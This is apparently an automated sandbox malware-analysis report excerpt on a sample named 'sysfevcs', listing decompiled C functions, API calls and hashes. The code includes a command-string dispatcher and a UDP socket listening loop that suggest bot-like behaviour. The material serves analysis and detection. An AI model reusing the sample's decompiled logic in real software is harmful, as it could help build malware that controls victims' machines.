                                                                                                                                                                                                                                                                  • Instruction ID: e4911f1bb612dec565c9ba4e541ce3718fd479aaefc0d4f532240961c72badea
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 156125bf305ec4522ec2416c3cfcc047802c257488583dec91db6bf8648615ec
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FAF090B4500308ABE3289B71AF0AB6636B4E704705F10817DE644AA2E1EFB9D814D75D
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E0040CEA0(WCHAR* _a4) {
                                                                                                                                                                                                                                                                  				long _v8;
                                                                                                                                                                                                                                                                  				void* _v12;
                                                                                                                                                                                                                                                                  				void* _t10;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				_t10 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0, 0); // executed
                                                                                                                                                                                                                                                                  				_v12 = _t10;
                                                                                                                                                                                                                                                                  				if(_v12 != 0xffffffff) {
                                                                                                                                                                                                                                                                  					_v8 = GetFileSize(_v12, 0);
                                                                                                                                                                                                                                                                  					FindCloseChangeNotification(_v12); // executed
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _v8;
                                                                                                                                                                                                                                                                  			}






                                                                                                                                                                                                                                                                  0x0040cea6
                                                                                                                                                                                                                                                                  0x0040cec0
                                                                                                                                                                                                                                                                  0x0040cec6
                                                                                                                                                                                                                                                                  0x0040cecd
                                                                                                                                                                                                                                                                  0x0040cedb
                                                                                                                                                                                                                                                                  0x0040cee2
                                                                                                                                                                                                                                                                  0x0040cee2
                                                                                                                                                                                                                                                                  0x0040ceee

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(00405200,80000000,00000001,00000000,00000003,00000000,00000000,00405200), ref: 0040CEC0
                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040CED5
                                                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 0040CEE2
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$ChangeCloseCreateFindNotificationSize
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4178644524-0
                                                                                                                                                                                                                                                                  • Opcode ID: a4300d774fd632c0f9d63dbd211ce4c92edc101d9ebdd6dd00a5cd8a803c8825
                                                                                                                                                                                                                                                                  • Instruction ID: 186596bd3e4392e29f4d4e3191c7eb3a5bb54b48d5bc5369a2d84aa2e2e261dc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4300d774fd632c0f9d63dbd211ce4c92edc101d9ebdd6dd00a5cd8a803c8825
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8BF01274A40308FBDB20DFA4DD49B9DBB74AB04711F204265FA04BB2C0D6715A558B94
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00405920(char* _a4) {
                                                                                                                                                                                                                                                                  				char* _v8;
                                                                                                                                                                                                                                                                  				char* _v12;
                                                                                                                                                                                                                                                                  				char* _v16;
                                                                                                                                                                                                                                                                  				void* _t39;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				if( *_a4 != 0x64) {
                                                                                                                                                                                                                                                                  					if( *_a4 == 0x75) {
                                                                                                                                                                                                                                                                  						_v16 = _a4 + 2;
                                                                                                                                                                                                                                                                  						E0040D210(_v16, 1); // executed
                                                                                                                                                                                                                                                                  						_t39 = _t39 + 8;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					L9:
                                                                                                                                                                                                                                                                  					return E00408990(_a4);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_v8 = _a4 + 2;
                                                                                                                                                                                                                                                                  				while(_v8 != 0) {
                                                                                                                                                                                                                                                                  					_v12 = StrChrA(_v8, 0x7c);
                                                                                                                                                                                                                                                                  					if(_v12 != 0) {
                                                                                                                                                                                                                                                                  						 *_v12 = 0;
                                                                                                                                                                                                                                                                  						_v12 =  &(_v12[1]);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					E0040D210(_v8, 0);
                                                                                                                                                                                                                                                                  					_t39 = _t39 + 8;
                                                                                                                                                                                                                                                                  					Sleep(0x3e8);
                                                                                                                                                                                                                                                                  					_v8 = _v12;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				goto L9;
                                                                                                                                                                                                                                                                  			}







                                                                                                                                                                                                                                                                  0x0040592f
                                                                                                                                                                                                                                                                  0x00405990
                                                                                                                                                                                                                                                                  0x00405998
                                                                                                                                                                                                                                                                  0x004059a1
                                                                                                                                                                                                                                                                  0x004059a6
                                                                                                                                                                                                                                                                  0x004059a6
                                                                                                                                                                                                                                                                  0x004059a9
                                                                                                                                                                                                                                                                  0x004059b8
                                                                                                                                                                                                                                                                  0x004059b8
                                                                                                                                                                                                                                                                  0x00405937
                                                                                                                                                                                                                                                                  0x0040593a
                                                                                                                                                                                                                                                                  0x0040594c
                                                                                                                                                                                                                                                                  0x00405953
                                                                                                                                                                                                                                                                  0x00405958
                                                                                                                                                                                                                                                                  0x00405961
                                                                                                                                                                                                                                                                  0x00405961
                                                                                                                                                                                                                                                                  0x0040596a
                                                                                                                                                                                                                                                                  0x0040596f
                                                                                                                                                                                                                                                                  0x00405977
                                                                                                                                                                                                                                                                  0x00405980
                                                                                                                                                                                                                                                                  0x00405980
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • StrChrA.SHLWAPI(00000000,0000007C), ref: 00405946
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 00405977
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                  • Opcode ID: 20fe58fbdda77a8a06b53cb406080e4d16445a1f802d363196eb8342b97bb016
                                                                                                                                                                                                                                                                  • Instruction ID: c101cff4bd38384b3b8d239de1e5c882252b078fa8503c04237c8483f96fadc6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20fe58fbdda77a8a06b53cb406080e4d16445a1f802d363196eb8342b97bb016
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 241182B4D00208FBDB04DFD4D885BAE7B74EB90315F10C0BAE9456B381D6399A84CF95
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00408780(void* __ecx, void* __edx, intOrPtr _a4, long _a8) {
                                                                                                                                                                                                                                                                  				int _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				void* _v16;
                                                                                                                                                                                                                                                                  				void* _t23;
                                                                                                                                                                                                                                                                  				void* _t30;
                                                                                                                                                                                                                                                                  				void* _t33;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t30 = __ecx;
                                                                                                                                                                                                                                                                  				if((E00408570() & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  					E004086E0(_t30); // executed
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				if(_a4 != 0) {
                                                                                                                                                                                                                                                                  					_v12 = E00408530(_a4 + 2, 4);
                                                                                                                                                                                                                                                                  					_t33 =  *0x412f74; // 0x2220000
                                                                                                                                                                                                                                                                  					_t23 = RtlAllocateHeap(_t33, _a8, _v12 + 0xc); // executed
                                                                                                                                                                                                                                                                  					_v16 = _t23;
                                                                                                                                                                                                                                                                  					if(_v16 != 0) {
                                                                                                                                                                                                                                                                  						_v8 = E00408750(_v16, _v12);
                                                                                                                                                                                                                                                                  						if((_a8 & 0x00000008) == 0) {
                                                                                                                                                                                                                                                                  							memset(_v8 + _a4, 0, _v12 - _a4);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _v8;
                                                                                                                                                                                                                                                                  			}









                                                                                                                                                                                                                                                                  0x00408780
                                                                                                                                                                                                                                                                  0x00408790
                                                                                                                                                                                                                                                                  0x00408792
                                                                                                                                                                                                                                                                  0x00408792
                                                                                                                                                                                                                                                                  0x00408797
                                                                                                                                                                                                                                                                  0x004087a2
                                                                                                                                                                                                                                                                  0x004087b5
                                                                                                                                                                                                                                                                  0x004087c3
                                                                                                                                                                                                                                                                  0x004087ca
                                                                                                                                                                                                                                                                  0x004087d0
                                                                                                                                                                                                                                                                  0x004087d7
                                                                                                                                                                                                                                                                  0x004087e9
                                                                                                                                                                                                                                                                  0x004087f2
                                                                                                                                                                                                                                                                  0x00408804
                                                                                                                                                                                                                                                                  0x00408809
                                                                                                                                                                                                                                                                  0x004087f2
                                                                                                                                                                                                                                                                  0x004087d7
                                                                                                                                                                                                                                                                  0x00408812

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00408570: GetCurrentProcessId.KERNEL32(?,0040878B,?,0040AD7E,00000010,?,?,?,?,?,?,0040AE9B), ref: 00408573
                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(02220000,?,-0000000C), ref: 004087CA
                                                                                                                                                                                                                                                                  • memset.NTDLL ref: 00408804
                                                                                                                                                                                                                                                                    • Part of subcall function 004086E0: HeapCreate.KERNELBASE(00000000,00000000,00000000,?,?,00408797,?,0040AD7E,00000010,?,?,?,?,?,?,0040AE9B), ref: 0040870C
                                                                                                                                                                                                                                                                    • Part of subcall function 004086E0: HeapSetInformation.KERNEL32(02220000,00000000,00000002,00000004), ref: 00408736
                                                                                                                                                                                                                                                                    • Part of subcall function 004086E0: GetCurrentProcessId.KERNEL32 ref: 0040873C
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$CurrentProcess$AllocateCreateInformationmemset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3494217179-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5a40ff8941f9acfafe054822f9d8a4cf866d6910dde63e7f01b25659cbd144f5
                                                                                                                                                                                                                                                                  • Instruction ID: 5287e89b21f4a3209ae8cc8e4ca680ddf9d4d06cf5bed68700b7426bc41282b6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a40ff8941f9acfafe054822f9d8a4cf866d6910dde63e7f01b25659cbd144f5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E118271D00108BBCB00EFA5DD45B9E7BB4AF84304F10C16DF544AB381EA39DA54CBA8
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                                                                                                                                  			E0040BC30(void* __ecx, void* __edi) {
                                                                                                                                                                                                                                                                  				intOrPtr* _v8;
                                                                                                                                                                                                                                                                  				LONG* _v12;
                                                                                                                                                                                                                                                                  				short _v16;
                                                                                                                                                                                                                                                                  				long _v20;
                                                                                                                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                                                                                                                  				intOrPtr* _t13;
                                                                                                                                                                                                                                                                  				LONG* _t14;
                                                                                                                                                                                                                                                                  				void* _t23;
                                                                                                                                                                                                                                                                  				intOrPtr _t27;
                                                                                                                                                                                                                                                                  				void* _t29;
                                                                                                                                                                                                                                                                  				void* _t30;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t28 = __edi;
                                                                                                                                                                                                                                                                  				_t23 = __ecx;
                                                                                                                                                                                                                                                                  				_push(0);
                                                                                                                                                                                                                                                                  				_t13 = E0040DA90(__edi);
                                                                                                                                                                                                                                                                  				_t30 = _t29 + 4;
                                                                                                                                                                                                                                                                  				_v8 = _t13;
                                                                                                                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                                                                                                                  					do {
                                                                                                                                                                                                                                                                  						_t14 = E004099A0(_t23); // executed
                                                                                                                                                                                                                                                                  						_v12 = _t14;
                                                                                                                                                                                                                                                                  						if(_v12 != 0 && InterlockedExchangeAdd(_v12, 0) == 0) {
                                                                                                                                                                                                                                                                  							_v20 = _v12[1];
                                                                                                                                                                                                                                                                  							_v16 = 0x9e34;
                                                                                                                                                                                                                                                                  							_t27 =  *0x4139cc; // 0x49492b13
                                                                                                                                                                                                                                                                  							E00409DD0(_v8, 0, _t27, 0, 0, E0040BBB0,  &_v20); // executed
                                                                                                                                                                                                                                                                  							_t30 = _t30 + 0x1c;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t23 =  *0x4139c4; // 0x538
                                                                                                                                                                                                                                                                  					} while (WaitForSingleObject(_t23, 0x1388) == 0x102);
                                                                                                                                                                                                                                                                  					return E0040DA20(_v8, _t28);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t13;
                                                                                                                                                                                                                                                                  			}














                                                                                                                                                                                                                                                                  0x0040bc30
                                                                                                                                                                                                                                                                  0x0040bc30
                                                                                                                                                                                                                                                                  0x0040bc37
                                                                                                                                                                                                                                                                  0x0040bc39
                                                                                                                                                                                                                                                                  0x0040bc3e
                                                                                                                                                                                                                                                                  0x0040bc41
                                                                                                                                                                                                                                                                  0x0040bc48
                                                                                                                                                                                                                                                                  0x0040bc4a
                                                                                                                                                                                                                                                                  0x0040bc4a
                                                                                                                                                                                                                                                                  0x0040bc4f
                                                                                                                                                                                                                                                                  0x0040bc56
                                                                                                                                                                                                                                                                  0x0040bc6e
                                                                                                                                                                                                                                                                  0x0040bc76
                                                                                                                                                                                                                                                                  0x0040bc87
                                                                                                                                                                                                                                                                  0x0040bc94
                                                                                                                                                                                                                                                                  0x0040bc99
                                                                                                                                                                                                                                                                  0x0040bc99
                                                                                                                                                                                                                                                                  0x0040bca1
                                                                                                                                                                                                                                                                  0x0040bcae
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040bcb8
                                                                                                                                                                                                                                                                  0x0040bcc1

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DA90: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,0040BC3E,00000000), ref: 0040DAB5
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DA90: socket.WS2_32(00000002,00000002,00000011), ref: 0040DAC4
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DA90: bind.WS2_32(?,?,00000010), ref: 0040DB05
                                                                                                                                                                                                                                                                    • Part of subcall function 004099A0: EnterCriticalSection.KERNEL32(004139AC,?,?,0040B5C9), ref: 004099B0
                                                                                                                                                                                                                                                                    • Part of subcall function 004099A0: LeaveCriticalSection.KERNEL32(004139AC,?,?,0040B5C9), ref: 004099DC
                                                                                                                                                                                                                                                                  • InterlockedExchangeAdd.KERNEL32(00000000,00000000), ref: 0040BC5E
                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000538,00001388), ref: 0040BCA8
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalSection$CreateEnterEventExchangeInterlockedLeaveObjectSingleWaitbindsocket
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3920643007-0
                                                                                                                                                                                                                                                                  • Opcode ID: d3194e084a3c3daac9c64cf10ac8c40041ac5ba569cb3d185cb49a0815c5ae3f
                                                                                                                                                                                                                                                                  • Instruction ID: 690827bb3a15378c03f6757f36cba5d35da519192de0a6811c76db886ea92e9f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d3194e084a3c3daac9c64cf10ac8c40041ac5ba569cb3d185cb49a0815c5ae3f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD0165B0E00204ABE700EF95C84ABAFB774EB44704F108079E501772D2D7796E40CB9C
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                                                                                                                                  			E00409490(intOrPtr _a4) {
                                                                                                                                                                                                                                                                  				char _v260;
                                                                                                                                                                                                                                                                  				char _v261;
                                                                                                                                                                                                                                                                  				int _v268;
                                                                                                                                                                                                                                                                  				signed int _v272;
                                                                                                                                                                                                                                                                  				int _t23;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v261 = 0;
                                                                                                                                                                                                                                                                  				_t23 = gethostname( &_v260, 0x100); // executed
                                                                                                                                                                                                                                                                  				if(_t23 != 0xffffffff) {
                                                                                                                                                                                                                                                                  					__imp__#52( &_v260); // executed
                                                                                                                                                                                                                                                                  					_v268 = _t23;
                                                                                                                                                                                                                                                                  					if(_v268 != 0) {
                                                                                                                                                                                                                                                                  						_v272 = 0;
                                                                                                                                                                                                                                                                  						while( *((intOrPtr*)( *((intOrPtr*)(_v268 + 0xc)) + _v272 * 4)) != 0) {
                                                                                                                                                                                                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v268 + 0xc)) + _v272 * 4)))) != _a4) {
                                                                                                                                                                                                                                                                  								_v272 = _v272 + 1;
                                                                                                                                                                                                                                                                  								continue;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								_v261 = 1;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							goto L8;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				L8:
                                                                                                                                                                                                                                                                  				return _v261;
                                                                                                                                                                                                                                                                  			}








                                                                                                                                                                                                                                                                  0x00409499
                                                                                                                                                                                                                                                                  0x004094ac
                                                                                                                                                                                                                                                                  0x004094b5
                                                                                                                                                                                                                                                                  0x004094be
                                                                                                                                                                                                                                                                  0x004094c4
                                                                                                                                                                                                                                                                  0x004094d1
                                                                                                                                                                                                                                                                  0x004094d3
                                                                                                                                                                                                                                                                  0x004094ee
                                                                                                                                                                                                                                                                  0x0040951a
                                                                                                                                                                                                                                                                  0x004094e8
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040951c
                                                                                                                                                                                                                                                                  0x0040951c
                                                                                                                                                                                                                                                                  0x0040951c
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040951a
                                                                                                                                                                                                                                                                  0x004094ee
                                                                                                                                                                                                                                                                  0x004094d1
                                                                                                                                                                                                                                                                  0x00409527
                                                                                                                                                                                                                                                                  0x00409530

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • gethostname.WS2_32(?,00000100), ref: 004094AC
                                                                                                                                                                                                                                                                  • gethostbyname.WS2_32(?), ref: 004094BE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: gethostbynamegethostname
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3961807697-0
                                                                                                                                                                                                                                                                  • Opcode ID: 84345339ffe9f57b88582afb15f5f9909f3e7e98a26f59d142a36f92e7176f45
                                                                                                                                                                                                                                                                  • Instruction ID: feda96f3a472f0df8059425c5a6c90e766251ce2964a9a67e560e3b1bd923444
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84345339ffe9f57b88582afb15f5f9909f3e7e98a26f59d142a36f92e7176f45
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C1100349082189BCB35CF14CC44BD9B771AB5A314F1482E9D48967791C7F9ADC5CF45
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: gethostbynameinet_addr
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1594361348-0
                                                                                                                                                                                                                                                                  • Opcode ID: d134eb4005882c79c245cb61b24f7a7d09553fca5521fd156cc3b87024abda87
                                                                                                                                                                                                                                                                  • Instruction ID: 3fd9b8f734e0b29d94e0878286e51eefb48c5a07ab68e480a17b2ffded514030
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d134eb4005882c79c245cb61b24f7a7d09553fca5521fd156cc3b87024abda87
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 00F01C38900208EFCB10EFE4D54899DBBB4FB48311F2086E9E915673A0D731AE84DB80
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00409340() {
                                                                                                                                                                                                                                                                  				void* _t1;
                                                                                                                                                                                                                                                                  				long _t2;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				while(1) {
                                                                                                                                                                                                                                                                  					_t1 =  *0x4139c4; // 0x538
                                                                                                                                                                                                                                                                  					_t2 = WaitForSingleObject(_t1, 0x3e8);
                                                                                                                                                                                                                                                                  					if(_t2 != 0x102) {
                                                                                                                                                                                                                                                                  						break;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					if(InterlockedDecrement(0x4123b4) == 0) {
                                                                                                                                                                                                                                                                  						E00409470(); // executed
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t2;
                                                                                                                                                                                                                                                                  			}





                                                                                                                                                                                                                                                                  0x00409343
                                                                                                                                                                                                                                                                  0x00409348
                                                                                                                                                                                                                                                                  0x0040934e
                                                                                                                                                                                                                                                                  0x00409359
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00409368
                                                                                                                                                                                                                                                                  0x0040936a
                                                                                                                                                                                                                                                                  0x0040936a
                                                                                                                                                                                                                                                                  0x0040936f
                                                                                                                                                                                                                                                                  0x00409372

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000538,000003E8), ref: 0040934E
                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(004123B4), ref: 00409360
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: DecrementInterlockedObjectSingleWait
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4086267124-0
                                                                                                                                                                                                                                                                  • Opcode ID: 0f38880d55ebe94a56aba1e40da3e695d2a8f613039472bcdeb0ed8cd1c17bb2
                                                                                                                                                                                                                                                                  • Instruction ID: aeb22cf07b8c17e6b4b8a32f618bf1902faa102f01836313b015f9511c27e36f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f38880d55ebe94a56aba1e40da3e695d2a8f613039472bcdeb0ed8cd1c17bb2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F9D0A77160430497D5102BF2ED4AD1B734CA715B11B108033F941F55C3D5FCAD408A2D
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
